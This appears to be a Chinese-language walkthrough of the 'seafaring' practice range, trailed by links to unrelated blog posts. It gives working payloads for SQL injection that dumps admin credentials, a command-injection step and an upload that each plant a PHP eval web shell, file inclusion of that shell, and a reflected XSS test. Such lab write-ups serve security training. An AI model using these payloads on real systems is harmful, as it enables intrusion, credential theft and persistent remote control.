seafaring靶场漏洞测试攻略

打开网页

一.sql注入漏洞

1.输入框测试回显点

-1 union select 1,2,3#

2.查看数据库名

-1 union select 1,2,database()#

3.查看表名

-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test'#

4.查看admin表中列名

-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='test' and table_name='admin'#

5.查看admin的账号和密码

-1 union select 1,2,group_concat(user_id,user_name,user_pass) from admin#

账号为admin,密码为mysql

二:命令执行漏洞

1.页面下方有一个执行框,输入ls查看

2.输入echo '<?php phpinfo();?>' > wff.php 访问wff.php

3.写入一句话木马,访问69.php

echo '<?php @eval($_POST['cmd']);?>' > 69.php

4.蚁剑连接

三:文件上传漏洞

1.使用 账号为admin,密码为mysql 登录网站后台,下方有一个上传文件的地方

2.上传php文件成功,尝试写入一句话木马到wff.php中上传

3.访问上传成功给的路径

4.蚁剑连接

四:文件包含漏洞

1.页面关于存在文件包含

2.通过访问之前写入的wff.php查看,远程文件包含关闭,本地文件可以访问

3.包含之前的69.php一句话木马,访问

4.蚁剑连接

五:反射型xss漏洞

1.登陆界面输入错误会回显在页面上

2.输入<script>alert(1)</script>,页面弹1

相关推荐
范纹杉想快点毕业2 小时前
从单片机基础到程序框架:全方位技术深度解析
数据库·mongodb
晚风_END2 小时前
Linux|操作系统|elasticdump的二进制方式部署
运维·服务器·开发语言·数据库·jenkins·数据库开发·数据库架构
devmoon2 小时前
Polkadot SDK 自定义 Pallet Benchmark 指南:生成并接入 Weight
开发语言·网络·数据库·web3·区块链·波卡
华农DrLai2 小时前
Spark SQL Catalyst 优化器详解
大数据·hive·sql·flink·spark
数据知道2 小时前
PostgreSQL 故障排查:紧急排查与 SQL 熔断处理(CPU 占用 100% 等情况)
数据库·sql·postgresql
静听山水2 小时前
Redis的Pipeline (管道)
数据库·redis·php
数据知道2 小时前
PostgreSQL 性能优化: I/O 瓶颈分析,以及如何提高数据库的 I/O 性能?
数据库·postgresql·性能优化
繁华落尽,寻一世真情2 小时前
【基于 AI 的智能小说创作助手】MuMuAINovel-sqlite 基于 AI 的智能小说创作助手
数据库·人工智能·sqlite
TOPGO智能2 小时前
在腾讯CloudStudio上成功部署Moltbot接入飞书
数据库
云边有个稻草人2 小时前
关系数据库替换用金仓:数据迁移过程中的完整性与一致性风险
数据库·国产数据库·kingbasees·金仓数据库·关系数据库替换用金仓